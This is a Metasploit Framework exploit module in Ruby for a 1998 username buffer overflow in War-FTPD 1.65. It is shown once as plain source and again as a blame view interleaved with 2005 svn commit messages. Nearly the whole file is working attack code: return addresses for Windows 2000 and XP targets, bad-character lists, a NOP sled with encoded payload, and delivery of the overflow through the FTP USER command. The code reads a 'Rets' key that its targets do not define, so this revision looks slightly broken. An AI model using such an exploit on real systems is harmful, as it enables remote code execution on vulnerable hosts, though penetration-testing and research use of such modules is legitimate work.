metasploit-framework/modules/exploits/windows/ftp/warftpd_165_user.rb

require 'msf/core/exploit/ftp'

module Msf

class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote

	include Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow found in the USER command
				in War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'OSVDB', '875'    ],
					[ 'MIL', '75'       ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					]
				]))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target['Rets'][0] ].pack('V')

		send_user(buf)

		disconnect

		handler
	end

end

end
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`require 'msf/core/exploit/ftp'`

			`module Msf`

picky picky git-svn-id: file:///home/svn/incoming/trunk@3067 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 04:01:27 +01:00			`class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
			`include Exploit::Remote::Ftp`

			`def initialize(info = {})`
			`super(update_info(info,`
Fixed bad target foo in ftp exploits Added TODO item about native packign git-svn-id: file:///home/svn/incoming/trunk@3070 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 04:46:53 +01:00			`'Name' => 'War-FTPD 1.65 Username Overflow',`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`'Description' => %q{`
			`This module exploits a buffer overflow found in the USER command`
			`in War-FTPD 1.65.`
			`},`
extraneouslyness git-svn-id: file:///home/svn/incoming/trunk@3027 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-13 19:35:44 +01:00			`'Author' => 'Fairuzan Roslan <riaf [at] mysec.org>',`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '875' ],`
			`[ 'MIL', '75' ],`
			`[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process'`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 424,`
			`'BadChars' => "\x00\x0a\x0d\x40",`
			`'StackAdjustment' => -3500,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => "-find"`
			`}`
			`},`
			`'Targets' =>`
			`[`
			`# Target 0`
			`[`
			`'Windows 2000 SP0-SP4 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x750231e2 # ws2help.dll`
			`},`
			`],`
			`# Target 1`
			`[`
			`'Windows XP SP0-SP1 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x71ab1d54 # push esp, ret`
			`}`
			`],`
			`# Target 2`
			`[`
			`'Windows XP SP2 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x71ab9372 # push esp, ret`
			`}`
			`]`
remove superfluous default git-svn-id: file:///home/svn/incoming/trunk@3024 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:50:05 +01:00			`]))`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

			`buf = make_nops(600) + payload.encoded`
Fixed bad target foo in ftp exploits Added TODO item about native packign git-svn-id: file:///home/svn/incoming/trunk@3070 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 04:46:53 +01:00			`buf[485, 4] = [ target['Rets'][0] ].pack('V')`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
			`send_user(buf)`

			`disconnect`

			`handler`
			`end`

			`end`

			`end`